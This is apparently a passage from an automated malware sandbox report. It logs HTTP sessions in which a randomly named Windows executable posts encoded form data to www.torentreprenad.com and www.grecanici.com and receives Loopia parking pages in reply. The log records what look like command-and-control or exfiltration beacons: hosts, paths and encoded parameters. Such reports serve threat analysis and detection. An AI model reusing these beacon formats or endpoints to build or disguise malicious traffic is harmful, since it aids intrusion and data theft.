May 30, 2024 15:04:05.937532902 CEST	1236	IN	Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09 Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
May 30, 2024 15:04:05.937561989 CEST	206	IN	Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49746	194.9.94.86	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:07.804661989 CEST	732	OUT	POST /r45o/ HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.torentreprenad.com Referer: http://www.torentreprenad.com/r45o/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 74 79 62 52 70 2f 42 50 6a 4a 65 68 4b 7a 6d 4a 58 75 64 39 50 71 55 53 63 33 56 32 36 39 46 55 79 2b 48 50 70 63 52 38 68 71 76 73 49 67 47 6a 38 43 2f 37 41 69 7a 58 39 43 76 53 6d 50 37 41 46 6e 58 5a 53 4c 6f 78 74 6e 66 57 4e 61 44 77 4f 75 6a 53 34 6e 56 66 68 69 79 67 63 53 56 4e 58 73 75 48 79 5a 49 32 47 4d 74 33 6e 72 6d 75 6f 69 34 68 37 38 6d 58 54 37 4a 68 78 43 71 59 62 76 6f 73 34 4f 33 49 68 47 6b 4a 79 4d 71 5a 58 66 4b 42 78 77 66 47 59 6a 61 30 4a 6d 42 4d 4d 76 79 65 72 31 2b 72 49 5a 4e 61 72 41 61 4c 47 61 57 62 67 55 75 49 4d 6a 57 51 56 38 39 69 50 74 34 45 47 59 36 31 74 55 34 53 36 6a 75 69 Data Ascii: I2ID3h=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V269FUy+HPpcR8hqvsIgGj8C/7AizX9CvSmP7AFnXZSLoxtnfWNaDwOujS4nVfhiygcSVNXsuHyZI2GMt3nrmuoi4h78mXT7JhxCqYbvos4O3IhGkJyMqZXfKBxwfGYja0JmBMMvyer1+rIZNarAaLGaWbgUuIMjWQV89iPt4EGY61tU4S6jui
May 30, 2024 15:04:08.465626001 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 May 2024 13:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
May 30, 2024 15:04:08.465656996 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
May 30, 2024 15:04:08.465667009 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
May 30, 2024 15:04:08.465676069 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
May 30, 2024 15:04:08.465687990 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49747	194.9.94.86	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:10.340210915 CEST	1749	OUT	POST /r45o/ HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.torentreprenad.com Referer: http://www.torentreprenad.com/r45o/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 74 78 47 5a 57 68 2f 6f 2f 35 38 36 74 79 62 52 70 2f 42 50 6a 4a 65 68 4b 7a 6d 4a 58 75 64 39 50 71 55 53 63 33 56 32 36 38 52 55 79 73 2f 50 6f 39 52 38 67 71 76 73 47 41 47 69 38 43 2b 35 41 69 36 63 39 43 72 43 6d 4e 44 41 44 45 66 5a 58 2b 55 78 34 33 66 57 45 36 44 78 41 4f 6a 39 34 6e 46 62 68 6a 43 67 63 53 56 4e 58 75 61 48 31 49 49 32 45 4d 74 32 67 72 6d 69 2b 69 34 4a 37 38 2b 74 54 36 39 62 77 79 4b 59 61 50 34 73 30 63 76 49 38 57 6c 76 7a 4d 71 4b 58 66 58 66 78 7a 37 77 59 6d 6d 4b 4a 6b 42 4d 64 37 48 58 2f 48 4f 4a 4b 59 78 51 6e 51 75 33 59 64 4f 64 67 6d 7a 37 4b 51 71 6d 53 66 52 4c 4b 5a 4d 6d 41 35 69 67 32 69 4d 53 30 7a 4c 32 41 30 73 79 44 33 38 7a 71 48 7a 2f 6b 62 57 41 6f 6a 55 73 38 78 61 63 4c 6a 64 55 73 48 6f 2b 70 67 34 2b 30 4d 51 35 79 65 62 50 38 34 56 73 30 45 74 58 36 4a 63 4b 6c 51 44 6c 6d 69 49 43 4a 78 75 69 30 36 48 31 41 6e 5a 5a 34 57 55 59 54 36 54 78 39 48 50 4e 47 6a 44 69 56 71 49 76 38 67 5a 39 5a 30 79 6d 6a 6b 4d 6b 52 70 59 [TRUNCATED] Data Ascii: I2ID3h=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V268RUys/Po9R8gqvsGAGi8C+5Ai6c9CrCmNDADEfZX+Ux43fWE6DxAOj94nFbhjCgcSVNXuaH1II2EMt2grmi+i4J78+tT69bwyKYaP4s0cvI8WlvzMqKXfXfxz7wYmmKJkBMd7HX/HOJKYxQnQu3YdOdgmz7KQqmSfRLKZMmA5ig2iMS0zL2A0syD38zqHz/kbWAojUs8xacLjdUsHo+pg4+0MQ5yebP84Vs0EtX6JcKlQDlmiICJxui06H1AnZZ4WUYT6Tx9HPNGjDiVqIv8gZ9Z0ymjkMkRpY1jmjHNC3Uo7R/CFLG/wd2ZWIQIEnQYzovh42riss4H7f4AQj/yWmHfZluwc3GgwmItoPqCo0/uT4QyzZ141gATVhCZ0WwRgaR/HGIslx/DUEv/FPupGPtM8I0FC6A+ikqAWD7RXn32eyVDaOQ+Xbf98Sz+/xSQzbCMjub19w/BhZU+6S1Slaeq64SPWGfzCtTXzDo9G0VtML8owo84h1Xjs+5MXX9p3kfLnE4EGPjFvZ30XN2Owg8OrDaIh44a2k2JNC2mmWVGm+0xu5W1kgxH+tIZSY+Gw/DWT9uP01+EGDAdu8YondM0se2cHtXN6qeBMybA7fxhmsh+rmqh+ozbxG0+Ovql0dG4qLtQB20ScpVoKXkm2ZJO8VDUakxn6pIkka65EjS5e2AaZ4+T1eJ7J+VULOYLWc5pLVshOLSyKWnhXBe8pQLfKVZzO31HFdBdYskMi5jv+HmBf3VtUSW/yBjcn51L4PnH0p/LFUI5LpTEt2NrBoZlyEWUtdeo+vdf5Yb3w6MHN31KmTg0vjRkAJRZkyHcRVDxdAUAT19lDhUasW+yeMkrpJZHdg2pm8tcFz6lVaUKksOBIAxwjJ5dBwRXKYoK5yKNYnTSgZ8NLx4xnQcP1spm9oiHClj6GwCs/cZhdencDgeHIK9jPNbJ33M6RX5m8rpl [TRUNCATED]
May 30, 2024 15:04:11.000962019 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 May 2024 13:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
May 30, 2024 15:04:11.001014948 CEST	224	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
May 30, 2024 15:04:11.001054049 CEST	1236	IN	Data Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
May 30, 2024 15:04:11.001090050 CEST	1236	IN	Data Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
May 30, 2024 15:04:11.001123905 CEST	1236	IN	Data Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20 Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
May 30, 2024 15:04:11.001162052 CEST	654	IN	Data Raw: 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 20 77 65 62 20 68 6f 73 74 69 6e 67 Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49748	194.9.94.86	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:12.883534908 CEST	444	OUT	GET /r45o/?I2ID3h=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2ulftPanOXvGI3UspsimcWApbI+/t5L5iOpVxhoCh3AVdsA==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.torentreprenad.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:04:13.532954931 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 May 2024 13:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
May 30, 2024 15:04:13.533001900 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
May 30, 2024 15:04:13.533018112 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
May 30, 2024 15:04:13.533035994 CEST	672	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
May 30, 2024 15:04:13.533051968 CEST	1236	IN	Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09 Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
May 30, 2024 15:04:13.533067942 CEST	206	IN	Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49749	35.214.235.206	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:18.617047071 CEST	697	OUT	POST /4iea/ HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.grecanici.com Referer: http://www.grecanici.com/4iea/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 48 73 51 52 4b 62 74 33 77 7a 4f 53 34 74 45 79 4a 2f 34 51 6c 69 52 47 75 76 33 52 47 6d 6f 4a 38 41 73 48 44 79 4d 44 50 49 66 30 6c 63 54 50 48 61 67 6a 45 76 54 67 37 58 46 4d 6d 32 4e 48 2f 79 74 61 62 77 70 31 78 6a 57 58 54 50 75 45 65 62 5a 66 6d 6a 74 6c 36 4c 47 4e 32 6b 67 39 30 46 71 2f 6e 73 6b 4e 47 44 6e 58 49 4d 2b 64 4a 39 78 41 57 44 6d 77 46 64 6c 38 55 41 58 51 32 30 32 36 34 51 6e 67 6d 54 31 75 6b 72 6b 4b 7a 33 6a 56 71 2b 59 61 34 38 39 6b 62 37 32 36 65 31 48 38 49 6e 66 4c 77 78 2f 67 76 50 41 39 69 44 2f 31 44 71 78 71 6a 4d 34 3d Data Ascii: I2ID3h=GNnztYNOslY1HsQRKbt3wzOS4tEyJ/4QliRGuv3RGmoJ8AsHDyMDPIf0lcTPHagjEvTg7XFMm2NH/ytabwp1xjWXTPuEebZfmjtl6LGN2kg90Fq/nskNGDnXIM+dJ9xAWDmwFdl8UAXQ20264QngmT1ukrkKz3jVq+Ya489kb726e1H8InfLwx/gvPA9iD/1DqxqjM4=
